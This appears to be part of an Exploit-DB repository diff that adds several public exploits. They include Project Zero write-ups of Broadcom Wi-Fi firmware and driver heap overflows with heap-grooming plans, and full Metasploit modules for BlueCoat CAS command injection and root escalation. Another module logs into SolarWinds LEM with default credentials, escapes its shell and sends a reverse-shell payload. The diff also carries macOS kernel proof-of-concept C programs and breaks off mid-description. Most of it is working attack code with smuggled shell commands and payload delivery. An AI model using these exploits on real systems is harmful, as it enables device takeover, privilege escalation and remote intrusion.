When the BCM firmware receives a TDLS Teardown frame, it first verifies the Link-ID information element in order to make sure it matches the current link information. Then, if the Link ID is valid, it calls the "wlc_tdls_cal_teardown_mic_chk" function in order to verify the MIC of the request. The function starts by extracting the Fast Transition IE information element (FTIE - number 55). Then, if the IE is present, its contents are copied into a heap-allocated buffer of length 256. The copy is performed using the length field present in the IE, and at a fixed offset from the buffer's start address. Since the length of the FTIE is not verified prior to the copy, this allows an attacker to include a large FTIE (e.g., with a length field of 255), causing the memcpy to overflow the heap-allocated buffer.
Here's the high-level logic of the "wlc_tdls_cal_teardown_mic_chk" function:
uint8_t* buffer = malloc(256);
...
uint8_t* linkid_ie = bcm_parse_tlvs(..., 101);
memcpy(buffer, linkid_ie, 0x14);
...
uint8_t* ft_ie = bcm_parse_tlvs(..., 55);
memcpy(buf + 0x18, ft_ie, ft_ie[1] + 2);
(Note that each IE is a TLV; the tag and value fields are each a single byte long. Therefore, ft_ie[1] is the IE's length field).
It should also be noted that the heap implementation used in the BCM firmware does not perform safe unlinking or include heap header cookies, allowing heap overflows such as the one described above to be exploited more reliably.
I'm attaching a patch to wpa_supplicant 2.6 which modifies the TDLS Teardown frame sent by the supplicant in order to trigger the heap overflow. You can reproduce the issue by following these steps:
1. Download wpa_supplicant 2.6 from https://w1.fi/releases/wpa_supplicant-2.6.tar.gz
2. Apply the included patch file
3. Build wpa_supplicant (with TDLS support)
4. Use wpa_supplicant to connect to a network
5. Connect to wpa_cli:
5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP <MAC_ADDRESS_OF_PEER>"
5.2. Teardown the connection using "TDLS_TEARDOWN <MAC_ADDRESS_OF_PEER>"
(Where MAC_ADDRESS_OF_PEER is the MAC address of a peer with a BCM SoC which is associated to the same network).
At this point the heap overflow will be triggered. The code in the patch will corrupt the heap, causing the remote BCM SoC to reset after a while.
I've been able to verify this vulnerability on the BCM4339 chip, running version 6.37.34.40 (as present on the Nexus 5). However, I believe this vulnerability's scope includes a wider range of Broadcom SoCs and versions.
patch
################################################################################
Attaching exploit - running exploit.py results in arbitrary code-execution on the Wi-Fi dongle.
Here is a high-level overview of the exploit:
1. Create a TDLS connection to the target device
2. Teardown the connection using a crafted "TDLS Teardown Request" frame, triggering the overflow
3. Create a new TDLS connection, using crafted arguments causing a situation where two chunks in
the freelist overlap one another
4. Send a TDLS frame with action code 127
4.1. Craft the size of the TDLS frame s.t. it overlaps the other chunk in the freelist
4.2. Craft the contents in order to point the free chunk to the location of a periodic timer
which was created during the firmware's initialization
5. Send another TDLS frame with action code 127
5.1. Craft the size of the TDLS frame s.t. it will be placed on top of the timer object
5.2. Craft the contents in order to replace the timer's data structures, allowing us to point
the timer's handler function at any arbitrary address. In this case, we point the handler
function at an address near the heap's end
6. Send a large TDLS frame with action code 127
6.1. Craft the frame's contents so that it contains the shellcode we'd like to execute
7. Since the heap is zero-initialized, and "00 00" is NOP (MOVS R0,R0) in Thumb, this means that
jumping to a location slightly before our created code chunk is fine, as it won't cause any
adverse affects until we reach our code blob. Putting all this together, Once the timer
expires, our code chunk is executed on the firmware
Note that sending crafted "TDLS Teardown Request" frames requires modifications to wpa_supplicant.
Moreover, sending TDLS frames with action code 127 requires modifications to both wpa_supplicant
and to the Linux Kernel (mac80211).
These changes (and instructions on how to apply them) are included in the exploit archive attached
to this comment.
TDLSExploit-1.tar.gz
################################################################################
Attaching updated exploits for both the Nexus 5 (MRA58K, BCM4339 6.37.34.40) and the Nexus 6P (NUF26K, BCM4358 version 7.112.201.1).
TDLSExploit-2.tar.gz
################################################################################
Adding firmware heap visualisers.
-create_dot_graph.py - Creates a "dot" graph containing the heap's free-chunks
-create_html_main_chunk.py - Creates an HTML visualisation of the heap's main region
-create_html_total.py - Created an HTML visualisation of the entire heap
-create_trace_html.py - Creates an HTML visualisation for traces from the malloc/free patches
-profiles.py - The symbols for each firmware "profile"
-utils.py - Utilities related to handling a firmware snapshot
BCMHeapVisualisers.tar.gz
################################################################################
Adding script to dump the timer list from a firmware snapshot.
dump_timers.py
################################################################################
Adding script to dump PCI ring information from firmware snapshot.
dump_pci.py
################################################################################
Adding inline firmware patcher.
-patch.py - The patcher itself.
-apply_* - Scripts to apply each of the patches using dhdutil
-<DEV>/BCMFreePatch - Patch for the "free" function in the firmware
-<DEV>/BCMMallocPatch - Patch for the "malloc" function in the firmware
-<DEV>/BCMDumpMPU - Patch that dumps the MPU's contents
BCMPatcher.tar.gz
Proofs of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41805.zip

60
platforms/hardware/remote/41808.txt Executable file
View file

@ -0,0 +1,60 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1061
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. On Android devices, the "bcmdhd" driver is used in order to communicate with the Wi-Fi SoC (also referred to as "dongle").
When the dongle wishes to notify the host OS of an event, it does so by encoding a special "packet" and transmitting it to the host. These packets have an ether type of 0x886C (referred to as ETHER_TYPE_BRCM), and do not contain actual packet data, but rather encapsulate information about events which must be handled by the driver.
After reading packets from the SDIO interface, the "bcmdhd" driver calls the function "dhd_rx_frame" to handle each of the received frames. If a frame has the special Broadcom ether type, it is passed on to an internal handling function, "dhd_wl_host_event". This function inspects the event code, and passes it onto the registered handlers for the given event type.
The function "wl_notify_gscan_event" is the registered handler for events of the following types:
-WLC_E_PFN_BEST_BATCHING
-WLC_E_PFN_SCAN_COMPLETE
-WLC_E_PFN_GSCAN_FULL_RESULT
-WLC_E_PFN_SWC
-WLC_E_PFN_BSSID_NET_FOUND
-WLC_E_PFN_BSSID_NET_LOST
-WLC_E_PFN_SSID_EXT
-WLC_E_GAS_FRAGMENT_RX
(for reference, see "wl_init_event_handler")
Specifically, when the event code "WLC_E_PFN_SWC" is received, the gscan handler function calls "dhd_handle_swc_evt" in order to process the event's data, like so:
1. void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes)
2. {
3. ...
4. wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data;
5. ...
6. gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
7. ...
8. if (!params->results_rxed_so_far) {
9. if (!params->change_array) {
10. params->change_array = (wl_pfn_significant_net_t *)
11. kmalloc(sizeof(wl_pfn_significant_net_t) * results->total_count, GFP_KERNEL);
12. ...
13. }
14. }
15. ...
16. change_array = &params->change_array[params->results_rxed_so_far];
17. memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count);
18. params->results_rxed_so_far += results->pkt_count;
19. ...
20. }
(where "event_data" is the arbitrary data encapsulated in the event passed in from the dongle)
When the function above is first invoked, the value of "params->change_array" is NULL. An attacker controlling the dongle may send a crafted WLC_E_PFN_SWC event, with the following values:
- results->total_count = SMALL_VALUE
- result->pkt_count = LARGE_VALUE
Since the function fails to verify that "pkt_count" is not larger than "total_count", this would cause the allocated buffer (lines 10-11) to be smaller than the size used in the memcpy operation (line 17), thus overflowing the buffer.
I've been able to statically verify these issues on the "bcmdhd-3.10" driver, and in the corresponding "bcmdhd" driver on the Nexus 6P's kernel (angler).
Adding sample EtherType exploit which achieves kernel code execution on the Nexus 5.
This exploit uses scapy-fakeap to broadcast a dummy network. The exploit starts the attack once a client with the target MAC connects to the network and sends an ARP request.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41808.zip

126
platforms/linux/local/41786.rb Executable file
View file

@ -0,0 +1,126 @@
# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS
# Date: April 3, 2017
# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd
# Contact: chrisdhebert[at]gmail.com
# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138
# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable
# Tested on: BlueCoat CAS 1.3.7.1
# CVE : cve-2016-9091
Timeline:
--------
08/31/2016 (Vulnerablities Discovered)
03/31/2017 (Final Vendor Patch Confirmed)
04/03/2017 (Public Release)
Description:
The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity.
A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script.
Proof of Concept:
Metasploit Module - root priv escalation (via mvtroubleshooting.sh)
-----------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
class Metasploit4 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::Local::Linux
def initialize(info={})
super( update_info( info, {
'Name' => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
'Description' => %q{
This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate
privileges. In order to work, a tomcat session with access to sudo on the sudoers
is needed. This module is useful for post exploitation of BlueCoat
vulnerabilities, where typically web server privileges are acquired, and this
user is allowed to execute sudo on the sudoers file.
},
'License' => MSF_LICENSE,
'Author' => [
'Chris Hebert <chrisdhebert[at]gmail.com>',
'Pete Paccione <petepaccione[at]gmail.com>',
'Corey Boyd <corey.k.boyd[at]gmail.com>'
],
'DisclosureDate' => 'Vendor Contacted 8-31-2016',
'References' =>
[
['EDB', '##TBD##'],
['CVE', '2016-9091' ],
['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138']
],
'Platform' => %w{ linux unix },
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ]
],
'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
'DefaultTarget' => 0,
}
))
register_options([
OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]),
], self.class)
end
def check
id=cmd_exec("id -un")
if id!="tomcat"
print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat")
fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat")
end
clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
if clprelease!="1.3.7.1"
print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
end
return Exploit::CheckCode::Vulnerable
end
def exploit
print_status("#{peer} - Checking for vulnerable BlueCoat session...")
if check != CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1")
end
print_status("#{peer} - Running Exploit...")
exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
write_file(exe_file, generate_payload_exe)
cmd_exec "chmod +x #{exe_file}"
begin
#Backup original nscd init script
cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
#Replaces /etc/init.d/nscd script with meterpreter payload
cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
#Executes meterpreter payload as root
cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
#note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
ensure
#Restores original nscd init script
cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
#Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
cmd_exec "/bin/rm -f #{exe_file}"
end
print_status("#{peer} - The exploit module has finished")
#Maybe something here to deal with timeouts?? noticied inconsistant.. Exploit failed: Rex::TimeoutError Operation timed out.
end
end

197
platforms/linux/remote/41785.rb Executable file
View file

@ -0,0 +1,197 @@
# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS
# Date: April 3, 2017
# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd
# Contact: chrisdhebert[at]gmail.com
# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138
# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable
# Tested on: BlueCoat CAS 1.3.7.1
# CVE : cve-2016-9091
Timeline:
--------
08/31/2016 (Vulnerablities Discovered)
03/31/2017 (Final Vendor Patch Confirmed)
04/03/2017 (Public Release)
Description:
The BlueCoat ASG and CAS management consoles are susceptible to an OS command injection vulnerability.
An authenticated malicious administrator can execute arbitrary OS commands with the privileges of the tomcat user.
Proof of Concept:
Metasploit Module - Remote Command Injection (via Report Email)
-----------------
##
# This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "BlueCoat CAS 1.3.7.1 \"Report Email\" Command Injection",
'Description' => %q{
BlueCoat CAS 1.3.7.1 (and possibly previous versions) are susceptible to an authenticated Remote Command Injection attack against
the Report Email functionality. This module exploits the vulnerability, resulting in tomcat execute permissions.
Any authenticated user within the 'administrator' group is able to exploit this; however, a user within the 'Readonly' group cannot.
},
'License' => MSF_LICENSE,
'Author' => [
'Chris Hebert <chrisdhebert[at]gmail.com>',
'Pete Paccione <petepaccione[at]gmail.com>',
'Corey Boyd <corey.k.boyd[at]gmail.com>'
],
'DisclosureDate' => 'Vendor Contacted 8-31-2016',
'Platform' => %w{ linux unix },
'Targets' =>
[
['BlueCoat CAS 1.3.7.1', {}],
],
'DefaultTarget' => 0,
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Payload' =>
{
'BadChars' => '',
'Compat' =>
{
#'PayloadType' => 'cmd python cmd_bash cmd_interact',
#'RequiredCmd' => 'generic perl python openssl bash awk', # metasploit may need to fix [bash,awk]
}
},
'References' =>
[
['CVE', '2016-9091'],
['EDB', '##TBD##'],
['URL', 'https://bto.bluecoat.com/security-advisory/sa138']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Privileged' => true))
register_options([
Opt::RPORT(8082),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ])
], self.class)
end
#Check BlueCoat CAS version - unauthenticated via GET /avenger/rest/version
def check
res = send_request_raw({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'avenger', 'rest', 'version')
})
clp_version = res.body.split("\<\/serialNumber\>\<version\>")
clp_version = clp_version[1]
clp_version = clp_version.split("\<")
clp_version = clp_version[0]
if res and clp_version != "1.3.7.1"
print_status("#{peer} - ERROR - BlueCoat version #{clp_version}, but must be 1.3.7.1")
fail_with(Failure::NotVulnerable, "BlueCoat version #{clp_version}, but must be 1.3.7.1")
end
return Exploit::CheckCode::Vulnerable
end
def exploit
print_status("#{peer} - Checking for vulnerable BlueCoat Host...")
if check != CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not version 1.3.7.1")
end
print_status("#{peer} - Running Exploit...")
post = {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'cas', 'v1', 'tickets'),
'method' => 'POST',
'vars_post' => post
})
unless res && res.code == 201
print_error("#{peer} - Server did not respond in an expected way")
return
end
redirect = res.headers['Location']
ticket1 = redirect.split("\/tickets\/").last
print_status("#{peer} - Step 1 - REQ:Login -> RES:Ticket1 -> #{ticket1}")
post = {
'service' => 'http://localhost:8447/avenger/j_spring_cas_security_check'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'cas', 'v1', 'tickets', "#{ticket1}"),
'method' => 'POST',
'vars_post' => post
})
ticket2 = res.body
print_status("#{peer} - Step 2 - REQ:Ticket1 -> RES:Ticket2 -> #{ticket2}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "avenger/j_spring_cas_security_check?dc=1472496573838&ticket=#{ticket2}")
})
unless res && res.code == 302
print_error("#{peer} - Server did not respond in an expected way")
return
end
cookie = res.get_cookies
print_status("#{peer} - Step 3 - REQ:Ticket2 -> RES:COOKIE -> #{cookie}")
if cookie.blank?
print_error("#{peer} - Could not retrieve a cookie")
return
end
unless res && res.code == 302
print_error("#{peer} - Server did not respond in an expected way")
return
end
cookie = res.get_cookies
if cookie.blank?
print_error("#{peer} - Could not retrieve the authenticated cookie")
return
end
print_status("#{peer} - LOGIN Process Complete ...")
print_status("#{peer} - Exploiting Bluecoat CAS v1.3.7.1 - Report Email ...")
if payload.raw.include?("perl") || payload.raw.include?("python") || payload.raw.include?("openssl")
#print_status("#{peer} - DEBUG: asci payload (perl,python, openssl,?bash,awk ")
post = "{\"reportType\":\"jpg\",\"url\":\"http\:\/\/localhost:8447/dev-report-overview.html\;echo #{Rex::Text.encode_base64(payload.raw)}|base64 -d|sh;\",\"subject\":\"CAS #{datastore["RHOST"]}: CAS Overview Report\"}"
else
#print_status("#{peer} - DEBUG - binary payload (meterpreter,etc, !!")
post = "{\"reportType\":\"jpg\",\"url\":\"http\:\/\/localhost:8447/dev-report-overview.html\;echo #{Rex::Text.encode_base64(payload.raw)}|base64 -d>/var/log/metasploit.bin;chmod +x /var/log/metasploit.bin;/var/log/metasploit.bin;\",\"subject\":\"CAS #{datastore["RHOST"]}: CAS Overview Report\"}"
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'avenger', 'rest', 'report-email', 'send'),
'method' => 'POST',
'cookie' => cookie,
'ctype' => 'application/json',
'data' => post
})
print_status("#{peer} - Payload sent ...")
end
end

164
platforms/linux/remote/41795.rb Executable file
View file

@ -0,0 +1,164 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "SolarWind LEM Default SSH Password Remote Code Execution",
'Description' => %q{
This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH
service is accessed with the default username and password which is "cmc" and "password". By exploiting a
vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
This module was tested against SolarWinds LEM v6.3.1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>', # discovery & msf module
],
'References' =>
[
['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'Privileged' => false,
'DisclosureDate' => "Mar 17 2017",
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(32022),
OptString.new('USERNAME', [ true, 'The username for authentication', 'cmc' ]),
OptString.new('PASSWORD', [ true, 'The password for authentication', 'password' ]),
]
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def exploit
factory = ssh_socket_factory
opts = {
:auth_methods => ['keyboard-interactive'],
:port => rport,
:use_agent => false,
:config => false,
:password => password,
:proxy => factory,
:non_interactive => true
}
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, opts)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
payload_executed = false
print_good("SSH connection is established.")
ssh.open_channel do |channel|
print_status("Requesting pty... We need it in order to interact with menuing system.")
channel.request_pty do |ch, success|
raise ::RuntimeError, "Could not request pty!" unless success
print_good("Pty successfully obtained.")
print_status("Requesting a shell.")
ch.send_channel_request("shell") do |ch, success|
raise ::RuntimeError, "Could not open shell!" unless success
print_good("Remote shell successfully obtained.")
end
end
channel.on_data do |ch, data|
if data.include? "cmc "
print_good("Step 1 is done. Managed to access terminal menu.")
channel.send_data("service\n")
end
if data.include? "service "
print_good("Step 2 is done. Managed to select 'service' sub menu.")
channel.send_data("restrictssh\n")
end
if data.include? "Press <enter> to configure restriction on the SSH service to the Manager Appliance"
print_good("Step 3 is done. Managed to start 'restrictssh' function.")
channel.send_data("*#`bash>&2`\n")
end
if data.include? "Are the hosts"
print_good("Step 4 is done. We are going to try escape from jail shell.")
channel.send_data("Y\n")
end
if data.include? "/usr/local/contego"
if payload_executed == false
print_good("Sweet..! Escaped from jail.")
print_status("Delivering payload...")
channel.send_data("python -c \"#{payload.encoded}\"\n")
payload_executed = true
end
end
end
end
ssh.loop unless session_created?
end
end
end

102
platforms/macos/dos/41790.c Executable file
View file

@ -0,0 +1,102 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1071
Selector 0x921 of IntelFBClientControl ends up in AppleIntelCapriController::GetLinkConfig
This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it
uses to index an array of pointers with no bounds checking:
This pointer is passed to AppleIntelFramebuffer::validateDisplayMode and the uint64 at offset +2130h is used as a C++ object pointer
on which a virtual method is called. With some heap grooming this could be used to get kernel code execution.
tested on MacOS Sierra 10.12.2 (16C67)
*/
// ianbeer
// build: clang -o capri_exec capri_exec.c -framework IOKit
#if 0
MacOS kernel code execution due to lack of bounds checking in AppleIntelCapriController::GetLinkConfig
Selector 0x921 of IntelFBClientControl ends up in AppleIntelCapriController::GetLinkConfig
This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it
uses to index an array of pointers with no bounds checking:
This pointer is passed to AppleIntelFramebuffer::validateDisplayMode and the uint64 at offset +2130h is used as a C++ object pointer
on which a virtual method is called. With some heap grooming this could be used to get kernel code execution.
tested on MacOS Sierra 10.12.2 (16C67)
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach_error.h>
#include <IOKit/IOKitLib.h>
int main(int argc, char** argv){
kern_return_t err;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl"));
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 0, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 4096;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0x1d8;
for (int step = 1; step < 1000; step++) {
memset(inputStruct, 0, inputStructCnt);
*(uint32_t*)inputStruct = 0x238 + (step*(0x2000/8));
outputStructCnt = 4096;
memset(outputStruct, 0, outputStructCnt);
err = IOConnectCallMethod(
conn,
0x921,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err == KERN_SUCCESS) {
break;
}
printf("retrying 0x2000 up - %s\n", mach_error_string(err));
}
uint64_t* leaked = (uint64_t*)(outputStruct+3);
for (int i = 0; i < 0x1d8/8; i++) {
printf("%016llx\n", leaked[i]);
}
return 0;
}

70
platforms/macos/dos/41791.c Executable file
View file

@ -0,0 +1,70 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1104
exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn.
It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS)
For the special, exception and audit ports it tries to update the new task to reflect the port action
by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if
any of those calls fail it calls ipc_port_release_send(port).
task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail
but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on
the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't
an audit session port.
This means we can cause two references to be dropped on the port when only one is held leading to a
use after free in the kernel.
Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2
*/
// ianbeer
#if 0
MacOS/iOS kernel uaf due to double-release in posix_spawn
exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn.
It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS)
For the special, exception and audit ports it tries to update the new task to reflect the port action
by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if
any of those calls fail it calls ipc_port_release_send(port).
task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail
but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on
the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't
an audit session port.
This means we can cause two references to be dropped on the port when only one is held leading to a
use after free in the kernel.
Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2
#endif
#include <stdio.h>
#include <stdlib.h>
#include <spawn.h>
#include <mach/mach.h>
int main() {
mach_port_t p = MACH_PORT_NULL;
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p);
mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
posix_spawnattr_t attrs;
posix_spawnattr_init(&attrs);
posix_spawnattr_setauditsessionport_np(&attrs,p);
char* _argv[] = {"/usr/bin/id", NULL};
int child_pid = 0;
int spawn_err = posix_spawn(&child_pid,
"/usr/bin/id",
NULL, // file actions
&attrs,
_argv,
NULL);
}

212
platforms/macos/dos/41797.c Executable file
View file

@ -0,0 +1,212 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1126
MacOS kernel memory corruption due to off-by-one in audit_pipe_open
audit_pipe_open is the special file open handler for the auditpipe device (major number 10.)
Here's the code:
static int
audit_pipe_open(dev_t dev, __unused int flags, __unused int devtype,
__unused proc_t p)
{
struct audit_pipe *ap;
int u;
u = minor(dev);
if (u < 0 || u > MAX_AUDIT_PIPES)
return (ENXIO);
AUDIT_PIPE_LIST_WLOCK();
ap = audit_pipe_dtab[u];
if (ap == NULL) {
ap = audit_pipe_alloc();
if (ap == NULL) {
AUDIT_PIPE_LIST_WUNLOCK();
return (ENOMEM);
}
audit_pipe_dtab[u] = ap;
We can control the minor number via mknod. Here's the definition of audit_pipe_dtab:
static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES];
There's an off-by-one in the minor number bounds check
(u < 0 || u > MAX_AUDIT_PIPES)
should be
(u < 0 || u >= MAX_AUDIT_PIPES)
The other special file operation handlers assume that the minor number of an opened device
is correct therefore it isn't validated for example in the ioctl handler:
static int
audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data,
__unused int flag, __unused proc_t p)
{
...
ap = audit_pipe_dtab[minor(dev)];
KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL"));
...
switch (cmd) {
case FIONBIO:
AUDIT_PIPE_LOCK(ap);
if (*(int *)data)
Directly after the audit_pipe_dtab array in the bss is this global variable:
static u_int64_t audit_pipe_drops;
audit_pipe_drops will be incremented each time an audit message enqueue fails:
if (ap->ap_qlen >= ap->ap_qlimit) {
ap->ap_drops++;
audit_pipe_drops++;
return;
}
So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the
struct audit_pipe* which is read out-of-bounds.
For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file
and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record
and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe*
then the ioctl will try to use that pointer.
This is a root to kernel privesc.
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
*/
//ianbeer
#if 0
MacOS kernel memory corruption due to off-by-one in audit_pipe_open
audit_pipe_open is the special file open handler for the auditpipe device (major number 10.)
Here's the code:
static int
audit_pipe_open(dev_t dev, __unused int flags, __unused int devtype,
__unused proc_t p)
{
struct audit_pipe *ap;
int u;
u = minor(dev);
if (u < 0 || u > MAX_AUDIT_PIPES)
return (ENXIO);
AUDIT_PIPE_LIST_WLOCK();
ap = audit_pipe_dtab[u];
if (ap == NULL) {
ap = audit_pipe_alloc();
if (ap == NULL) {
AUDIT_PIPE_LIST_WUNLOCK();
return (ENOMEM);
}
audit_pipe_dtab[u] = ap;
We can control the minor number via mknod. Here's the definition of audit_pipe_dtab:
static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES];
There's an off-by-one in the minor number bounds check
(u < 0 || u > MAX_AUDIT_PIPES)
should be
(u < 0 || u >= MAX_AUDIT_PIPES)
The other special file operation handlers assume that the minor number of an opened device
